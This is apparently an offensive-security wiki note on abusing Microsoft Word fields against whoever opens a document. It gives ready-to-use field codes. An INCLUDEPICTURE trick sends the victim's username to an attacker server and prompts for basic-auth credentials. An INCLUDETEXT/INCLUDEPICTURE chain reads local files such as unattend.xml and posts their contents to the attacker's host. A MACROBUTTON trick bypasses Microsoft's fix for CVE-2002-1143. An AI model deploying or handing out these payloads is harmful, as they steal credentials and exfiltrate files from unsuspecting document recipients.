Field Abuse

Fields are a feature in MS Word to create dynamic components which automate tasks like updating dates or page numbering. To insert a field, go to: insert > quickparts > fields. You will then have a whole list of field options to choose from.

Credential Popup

This uses the INCLUDEPICTURE field that points to a webserver that replies back with a basic HTTP basic authentication request. The URL of the INCLUDPICTURE is made dynamic with the USERNAME field. Note that word does not continue loading until the picture is loaded.

{ INCLUDEPICTURE \d "http://<ip>/{ USERNAME \* MERGEFORMAT}"\* MERGEFORMATINET }

Note: your server needs to reply back with basic HTTP authentication to capture credentials

Arbitrary File Read

The INCLUDETEXT field will read a file and include its contents in the document. As you can see, this is self explanatory on how we will read the file. To send the file contents back to a server, the INCLUDEPICTURE field will be used.

NOTE: (CVE-2002-1143) abused the INCLUDETEXT and INCLUDEPICTURE to arbitrarily read a file, but Microsoft fixed this by no longer automatically updating the INCLUDETEXT fields on various events.

{ INCLUDEPICTURE { QUOTE "http://server" & { FILENAME \p } & { INCLUDETEXT "c:\read\file.txt" } } \d }

To bypass this mitigation, we will use the MACROBUTTON field with the option "updatefields" which will update file, and trigger the arbitrary file read.

{ MACROBUTTON UpdateFields { INCLUDEPICTURE \d "http://picture.com/picture.png" \* MERGEFORMATIINET}{ INCLUDEPICTURE "http://<ip>/?{ INCLUDETEXT "c:\\windows\\panther\\unattend.xml" \c XML \* MERGEFORMAT}}" \d \* MERGEFORMAT }}

This will make a picture-button hybird in which if the user double clicks on this and accepts a prompt, the MACROBUTTON field will update all the fields and cause the said file to be posted to our web server.

Resources